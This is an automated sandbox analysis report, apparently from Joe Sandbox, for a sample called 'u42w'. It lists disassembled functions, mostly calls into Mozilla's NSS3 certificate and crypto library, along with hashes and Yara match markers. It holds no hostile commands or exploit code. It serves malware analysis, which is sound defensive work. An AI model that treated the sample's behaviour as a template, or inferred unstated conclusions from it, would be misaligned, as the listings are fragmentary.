                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4032354334-0
                                                                                                                                                                                                                              • Opcode ID: 51a8fa736b7efc8bc0f6e58ac670ca362e77866d3d6716d6bc6342a6cd570355
                                                                                                                                                                                                                              • Instruction ID: 4f83d2eb92e4a30edfd4cf0bda1e19292cedd8f7f8b4389d2531ff9ed6661636
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51a8fa736b7efc8bc0f6e58ac670ca362e77866d3d6716d6bc6342a6cd570355
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B41A8B69002059BEB115F65ED44A6A77B8BF2525CF058170EC18C7B12FB31E925CFB1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C99CD08
                                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6C99CE16
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C99D079
                                                                                                                                                                                                                                • Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1351604052-0
                                                                                                                                                                                                                              • Opcode ID: 3356c0008829499190989271beaaef6605331684be0c56895cbca96551bc02b6
                                                                                                                                                                                                                              • Instruction ID: 521f93edbd80027f6711adf916292422cc4ae31cbb1056774094cf2ea291d893
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3356c0008829499190989271beaaef6605331684be0c56895cbca96551bc02b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82C181B5A002199BDB10CF24CC80BDAB7B8BF58318F1841A8E94DA7741E775EE95CF90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(282313D0), ref: 6C952C5D
                                                                                                                                                                                                                                • Part of subcall function 6C9B0D30: calloc.MOZGLUE ref: 6C9B0D50
                                                                                                                                                                                                                                • Part of subcall function 6C9B0D30: TlsGetValue.KERNEL32 ref: 6C9B0D6D
                                                                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C952C8D
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C952CE0
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C952CDA,?,00000000), ref: 6C952E1E
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C952E33
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: TlsGetValue.KERNEL32 ref: 6C952E4E
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: EnterCriticalSection.KERNEL32(?), ref: 6C952E5E
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: PL_HashTableLookup.NSS3(?), ref: 6C952E71
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: PL_HashTableRemove.NSS3(?), ref: 6C952E84
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C952E96
                                                                                                                                                                                                                                • Part of subcall function 6C952E00: PR_Unlock.NSS3 ref: 6C952EA9
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C952D23
                                                                                                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C952D30
                                                                                                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6C952D3F
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C952D73
                                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C952DB8
                                                                                                                                                                                                                              • free.MOZGLUE ref: 6C952DC8
                                                                                                                                                                                                                                • Part of subcall function 6C953E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C953EC2
                                                                                                                                                                                                                                • Part of subcall function 6C953E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C953ED6
                                                                                                                                                                                                                                • Part of subcall function 6C953E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C953EEE
                                                                                                                                                                                                                                • Part of subcall function 6C953E60: PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0), ref: 6C953F02
                                                                                                                                                                                                                                • Part of subcall function 6C953E60: PL_FreeArenaPool.NSS3 ref: 6C953F14
                                                                                                                                                                                                                                • Part of subcall function 6C953E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C953F27
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                                                                                                              • Opcode ID: caeb05856fe9cd841296fc6ab9454c1c6b37fcccf8c818d9e45da79172d90878
                                                                                                                                                                                                                              • Instruction ID: 5bb06e3606b85eb9d2dd170853c6f46ba2eaca461caed1be12b007a5e882d08c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: caeb05856fe9cd841296fc6ab9454c1c6b37fcccf8c818d9e45da79172d90878
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7351FF72A047169BEB01DF68DC88B6B77E9EFA4348F540428EC5983650E731E825CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C98ACE6
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C98AD14
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C98AD23
                                                                                                                                                                                                                                • Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C98AD39
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                              • API String ID: 332880674-3521875567
                                                                                                                                                                                                                              • Opcode ID: 01e7b02d7df51c0eeb27e9eeeee1e026ad51b2efa3dfe7a5d4bec451b5f6fddb
                                                                                                                                                                                                                              • Instruction ID: aa2ea971fbc023850e21ce827d8aa9010188533b7581bb79103c78aef865fbd2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01e7b02d7df51c0eeb27e9eeeee1e026ad51b2efa3dfe7a5d4bec451b5f6fddb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28212F716022059FD7049F54ED48B6A7775BB5130DF048925E40ADBBA1DF30D84EC7A6
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6C97124D,00000001), ref: 6C968D19
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6C97124D,00000001), ref: 6C968D32
                                                                                                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6C97124D,00000001), ref: 6C968D73
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C97124D,00000001), ref: 6C968D8C
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6C97124D,00000001), ref: 6C968DBA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                                                                                                              • API String ID: 2419422920-169145855
                                                                                                                                                                                                                              • Opcode ID: c5ac457ec79a0461a8f2bcd5f36e87de0de40bed24d56a52d31b529ed7b1c972
                                                                                                                                                                                                                              • Instruction ID: 5611ddd76d925f96a0b624897365ddad6570038a32934e280a40e95436925019
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5ac457ec79a0461a8f2bcd5f36e87de0de40bed24d56a52d31b529ed7b1c972
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D321A0B1A046018FEB08EF3AC48415AB7F4FF56308F15896AD99887B41E734D842CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 0041884F
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0041886F
                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041887F
                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041889C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004188AF
                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00423530), ref: 004188C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                              • String ID: 05B
                                                                                                                                                                                                                              • API String ID: 3470314060-3788103304
                                                                                                                                                                                                                              • Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                              • Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA24DC3
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA24DE0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA24DCB
                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA24DDA
                                                                                                                                                                                                                              • invalid, xrefs: 6CA24DB8
                                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CA24DBD
                                                                                                                                                                                                                              • misuse, xrefs: 6CA24DD5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                                              • Opcode ID: 6e5e4dc3d2d2a861c7061fec7be6a456874a40bddfd00bc6aae3c2aa49ab1552
                                                                                                                                                                                                                              • Instruction ID: 2726cbe2fa06ac9c01dc2ef8797eb7fb9713d408cd84665afceeb5fea405d5d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e5e4dc3d2d2a861c7061fec7be6a456874a40bddfd00bc6aae3c2aa49ab1552
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F0E921F156746FD7005115CD11F8637A96F1132DF4E09E1ED046BE92E20DECD082E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CA24E30
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA24E4D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA24E38
                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA24E47
                                                                                                                                                                                                                              • invalid, xrefs: 6CA24E25
                                                                                                                                                                                                                              • API call with %s database connection pointer, xrefs: 6CA24E2A
                                                                                                                                                                                                                              • misuse, xrefs: 6CA24E42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                              • API String ID: 632333372-2974027950
                                                                                                                                                                                                                              • Opcode ID: b9cabbd0243a845de7b1d66a6605881978f05c8f4e963d6b5f17ce24c6967deb
                                                                                                                                                                                                                              • Instruction ID: 65ac2a16c60e3f7bb43cfc38b948579af731b4a7731fae78be84892cb76a3d03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9cabbd0243a845de7b1d66a6605881978f05c8f4e963d6b5f17ce24c6967deb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF02711F459382FF71050299C10FC637AA6B11329F4D44A1EA0C6BE92D30DDCE042F1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                              • API String ID: 1494266314-163128923
                                                                                                                                                                                                                              • Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                              • Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?,?,00000000,?,?), ref: 6C990CB3
                                                                                                                                                                                                                                • Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?), ref: 6C990DC1
                                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?), ref: 6C990DEC
                                                                                                                                                                                                                                • Part of subcall function 6C9B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C952AF5,?,?,?,?,?,6C950A1B,00000000), ref: 6C9B0F1A
                                                                                                                                                                                                                                • Part of subcall function 6C9B0F10: malloc.MOZGLUE(00000001), ref: 6C9B0F30
                                                                                                                                                                                                                                • Part of subcall function 6C9B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C9B0F42
                                                                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?), ref: 6C990DFF
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C991444,?,00000001,?,00000000), ref: 6C990E16
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?), ref: 6C990E53
                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?,?,6C991444,?,?,00000000), ref: 6C990E65
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C991444,?,00000001,?,00000000,00000000,?), ref: 6C990E79
                                                                                                                                                                                                                                • Part of subcall function 6C9A1560: TlsGetValue.KERNEL32(00000000,?,6C970844,?), ref: 6C9A157A
                                                                                                                                                                                                                                • Part of subcall function 6C9A1560: EnterCriticalSection.KERNEL32(?,?,?,6C970844,?), ref: 6C9A158F
                                                                                                                                                                                                                                • Part of subcall function 6C9A1560: PR_Unlock.NSS3(?,?,?,?,6C970844,?), ref: 6C9A15B2
                                                                                                                                                                                                                                • Part of subcall function 6C96B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C971397,00000000,?,6C96CF93,5B5F5EC0,00000000,?,6C971397,?), ref: 6C96B1CB
                                                                                                                                                                                                                                • Part of subcall function 6C96B1A0: free.MOZGLUE(5B5F5EC0,?,6C96CF93,5B5F5EC0,00000000,?,6C971397,?), ref: 6C96B1D2
                                                                                                                                                                                                                                • Part of subcall function 6C9689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C9688AE,-00000008), ref: 6C968A04
                                                                                                                                                                                                                                • Part of subcall function 6C9689E0: EnterCriticalSection.KERNEL32(?), ref: 6C968A15
                                                                                                                                                                                                                                • Part of subcall function 6C9689E0: memset.VCRUNTIME140(6C9688AE,00000000,00000132), ref: 6C968A27
                                                                                                                                                                                                                                • Part of subcall function 6C9689E0: PR_Unlock.NSS3(?), ref: 6C968A35
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1601681851-0
